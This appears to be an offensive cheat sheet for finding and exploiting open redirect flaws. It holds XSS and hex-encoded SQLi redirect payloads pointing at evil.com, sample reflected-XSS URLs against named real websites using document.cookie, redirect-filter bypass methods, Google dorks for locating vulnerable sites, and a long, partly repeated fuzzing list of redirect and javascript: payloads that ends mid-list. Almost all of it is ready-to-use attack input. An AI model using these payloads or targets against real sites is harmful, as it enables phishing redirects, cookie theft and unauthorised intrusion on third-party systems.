💥Open Redirect (CWE-601)

XSS to Open Redirect

'"><svg/onload="location.replace('https://evil.com')"
'"><svg/onload="location.replace('https://openbugbounty.org')"
https://evil.com/

SQLI to Open Redirect


0x27223E3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6576696C2E636F6D272922
0x3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6F70656E627567626F756E74792E6F7267272922

Sample

https://www.littlehardware.com/inet/storefront/store.php?mode=showproductdetail%27%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E&product=-1&link_id=-1&link_itemcode=0917047&category=&department=36

https://www.dom-home.me/index.php?strana=9&lang=novosti%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E

https://tvtropes.org/pmwiki/index_report.php?filter=asad%22%3E%3Cscript%3Ealert(1)%3C/script%3E

https://www.dumooresystems.com/drainage-products.php?cat=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

https://www.pnccs.edu.in/?s=%22%3E%3C/title%3E%3Csvg%20onload=alert(1)%3E

Method 1

First login to your Account
the Right click to Logout Button
the click to: Copy Link without site Tracking and check it logout URL
then ad payload and enter https://target.com/?https://google.com
then click Logout Button Boom if Vulnerable then Riderect..

Method 2

While you I trying to redirect https://targetweb.com?url=http://attackersite.com it did not redirected!

I Created a new subdomain with with www.targetweb.com.attackersite.com

And when I tried to redirect with https://targetweb.comurl=www.targetweb.com.attackersite.com

It will successfully redirected to the www.targetweb.com.attackersite.com website!

Due to the bad regex it has been successfully bypass their protection!

Google Dorks to find open redirects:

inurl:url=https

inurl:url=http

inurl:u=https

inurl:u=http

inurl:redirect?https

inurl:redirect?http

inurl:redirect=https

inurl:redirect=http

inurl:link=http

inurl:link=https

inurl:redirect_uri=

inurl:redirect_url=

-----------------------------------------------------------

Payloads to FUZZ open redirects:

/%09/bing.com
/%2f%2fbing.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cbing.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.bing.com
//%09/bing.com
//%5cbing.com
///%09/bing.com
///%5cbing.com
////%09/bing.com
////%5cbing.com
/////bing.com
/////bing.com/
////\;@bing.com
////bing.com/



////bing.com/%2e%2e
////bing.com/%2e%2e%2f
////bing.com/%2f%2e%2e
////bing.com%2f..
////bing.com//
///bing.com
///bing.com/
//google.com/%2f..
//bing.com@google.com/%2f..
///google.com/%2f..
///bing.com@google.com/%2f..
////google.com/%2f..
////www.bing.com@google.com/%2f..
https://google.com/%2f..
https://www.bing.com@google.com/%2f..
/https://google.com/%2f..
/https://www.bing.com@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.bing.com@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.bing.com@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.bing.com@www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://www.bing.com@www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.bing.com@www.google.com/%2f%2e%2e
//google.com/
//www.bing.com@google.com/
///google.com/
///www.bing.com@google.com/
////google.com/
////www.bing.com@google.com/
https://google.com/
https://www.bing.com@google.com/
/https://google.com/
/https://www.bing.com@google.com/
//google.com//
//www.bing.com@google.com//
///google.com//
///www.bing.com@google.com//
////google.com//
////www.bing.com@google.com//
https://google.com//
https://www.bing.com@google.com//
//https://google.com//
//https://www.bing.com@google.com//
//www.google.com/%2e%2e%2f
//www.bing.com@www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
///www.bing.com@www.google.com/%2e%2e%2f
////www.google.com/%2e%2e%2f
////www.bing.com@www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
https://www.bing.com@www.google.com/%2e%2e%2f
//https://www.google.com/%2e%2e%2f
//https://www.bing.com@www.google.com/%2e%2e%2f
///www.google.com/%2e%2e
///www.bing.com@www.google.com/%2e%2e
////www.google.com/%2e%2e
////www.bing.com@www.google.com/%2e%2e
https:///www.google.com/%2e%2e
https:///www.bing.com@www.google.com/%2e%2e
//https:///www.google.com/%2e%2e
//www.bing.com@https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
/https://www.bing.com@www.google.com/%2e%2e
///www.google.com/%2f%2e%2e
///www.bing.com@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.bing.com@www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https:///www.bing.com@www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.bing.com@www.google.com/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///www.bing.com@www.google.com/%2f%2e%2e
/%09/google.com
/%09/www.bing.com@google.com
//%09/google.com
//%09/www.bing.com@google.com
///%09/google.com
///%09/www.bing.com@google.com
////%09/google.com
////%09/www.bing.com@google.com
https://%09/google.com
https://%09/www.bing.com@google.com
/%5cgoogle.com
/%5cwww.bing.com@google.com
//%5cgoogle.com
//%5cwww.bing.com@google.com
///%5cgoogle.com
///%5cwww.bing.com@google.com
////%5cgoogle.com
////%5cwww.bing.com@google.com
https://%5cgoogle.com
https://%5cwww.bing.com@google.com
/https://%5cgoogle.com
/https://%5cwww.bing.com@google.com
https://google.com
https://www.bing.com@google.com


javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
https://www.whitelisteddomain.tld/https://www.google.com/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@www.whitelisteddomain.tld
https://:@google.com\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:80?@www.whitelisteddomain.tld/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
//example.com
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//google%00.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

//%2fxgoogle.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
//localdomain.pw/%2f..
//www.whitelisteddomain.tld@localdomain.pw/%2f..
///localdomain.pw/%2f..
///www.whitelisteddomain.tld@localdomain.pw/%2f..
////localdomain.pw/%2f..
////www.whitelisteddomain.tld@localdomain.pw/%2f..
https://localdomain.pw/%2f..
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
/https://localdomain.pw/%2f..
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
//localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//localdomain.pw/
//www.whitelisteddomain.tld@localdomain.pw/
///localdomain.pw/
///www.whitelisteddomain.tld@localdomain.pw/
////localdomain.pw/
////www.whitelisteddomain.tld@localdomain.pw/
https://localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw/
/https://localdomain.pw/
/https://www.whitelisteddomain.tld@localdomain.pw/
//localdomain.pw//
//www.whitelisteddomain.tld@localdomain.pw//
///localdomain.pw//
///www.whitelisteddomain.tld@localdomain.pw//
////localdomain.pw//
////www.whitelisteddomain.tld@localdomain.pw//
https://localdomain.pw//
https://www.whitelisteddomain.tld@localdomain.pw//
//https://localdomain.pw//
//https://www.whitelisteddomain.tld@localdomain.pw//
//localdomain.pw/%2e%2e%2f
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
////localdomain.pw/%2e%2e%2f
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//https://localdomain.pw/%2e%2e%2f
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
//https:///localdomain.pw/%2e%2e
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/%09/localdomain.pw
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
https://%09/localdomain.pw
https://%09/www.whitelisteddomain.tld@localdomain.pw
/%5clocaldomain.pw
/%5cwww.whitelisteddomain.tld@localdomain.pw
//%5clocaldomain.pw
//%5cwww.whitelisteddomain.tld@localdomain.pw
///%5clocaldomain.pw
///%5cwww.whitelisteddomain.tld@localdomain.pw
////%5clocaldomain.pw
////%5cwww.whitelisteddomain.tld@localdomain.pw
https://%5clocaldomain.pw
https://%5cwww.whitelisteddomain.tld@localdomain.pw
/https://%5clocaldomain.pw
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
https://localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//localdomain.pw
https:localdomain.pw
//localdomain%E3%80%82pw
\/\/localdomain.pw/
/\/localdomain.pw/
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
//localdomain%00.pw
https://www.whitelisteddomain.tld/https://localdomain.pw/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱localdomain.pw
〵localdomain.pw
ゝlocaldomain.pw
ーlocaldomain.pw
ｰlocaldomain.pw
/〱localdomain.pw
/〵localdomain.pw
/ゝlocaldomain.pw
/ーlocaldomain.pw
/ｰlocaldomain.pw
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//localdomain.pw
//localdomain.pw\@www.whitelisteddomain.tld
https://:@localdomain.pw\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:80?@www.whitelisteddomain.tld/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
http://localdomain.pw\twww.whitelisteddomain.tld/
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:80?@www.whitelisteddomain.tld/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
//localdomain.pw\twww.whitelisteddomain.tld/
//;@localdomain.pw
http://;@localdomain.pw
@localdomain.pw
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld%2elocaldomain.pw/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5clocaldomain.pw/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://localdomain.pw
/%2f%2flocaldomain.pw
/localdomain.pw/%2f%2e%2e
/http:/localdomain.pw
/.localdomain.pw
http://.localdomain.pw
.localdomain.pw
///\;@localdomain.pw
///localdomain.pw
/////localdomain.pw/
/////localdomain.pw
java%0ascript:alert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
Javas%26%2399;ript:alert(1)
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
http://www.localdomain.pw\.www.whitelisteddomain.tld
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
//example.com@google.com/%2f..
///google.com/%2f..
///example.com@google.com/%2f..
////google.com/%2f..
////example.com@google.com/%2f..
https://google.com/%2f..
https://example.com@google.com/%2f..
/https://google.com/%2f..
/https://example.com@google.com/%2f..
//google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
////example.com@google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://example.com@google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
//google.com/
//example.com@google.com/
///google.com/
///example.com@google.com/
////google.com/
////example.com@google.com/
https://google.com/
https://example.com@google.com/
/https://google.com/
/https://example.com@google.com/
//google.com//
//example.com@google.com//
///google.com//
///example.com@google.com//
////google.com//
////example.com@google.com//
https://google.com//
https://example.com@google.com//
//https://google.com//
//https://example.com@google.com//
//google.com/%2e%2e%2f
//example.com@google.com/%2e%2e%2f
///google.com/%2e%2e%2f
///example.com@google.com/%2e%2e%2f
////google.com/%2e%2e%2f
////example.com@google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
https://example.com@google.com/%2e%2e%2f
//https://google.com/%2e%2e%2f
//https://example.com@google.com/%2e%2e%2f
///google.com/%2e%2e
///example.com@google.com/%2e%2e
////google.com/%2e%2e
////example.com@google.com/%2e%2e
https:///google.com/%2e%2e
https:///example.com@google.com/%2e%2e
//https:///google.com/%2e%2e
//example.com@https:///google.com/%2e%2e
/https://google.com/%2e%2e
/https://example.com@google.com/%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
////example.com@google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https:///example.com@google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///example.com@google.com/%2f%2e%2e
/%09/google.com
/%09/example.com@google.com
//%09/google.com
//%09/example.com@google.com
///%09/google.com
///%09/example.com@google.com
////%09/google.com
////%09/example.com@google.com
https://%09/google.com
https://%09/example.com@google.com
/%5cgoogle.com
/%5cexample.com@google.com
//%5cgoogle.com
//%5cexample.com@google.com
///%5cgoogle.com
///%5cexample.com@google.com
////%5cgoogle.com
////%5cexample.com@google.com
https://%5cgoogle.com
https://%5cexample.com@google.com
/https://%5cgoogle.com
/https://%5cexample.com@google.com
https://google.com
https://example.com@google.com
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
https://example.com/https://google.com/
";alert(0);//
javascript://example.com?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://example.com@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://example.com@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://example.com@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://example.com@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://example.com@00330.00072.0000326.00000316
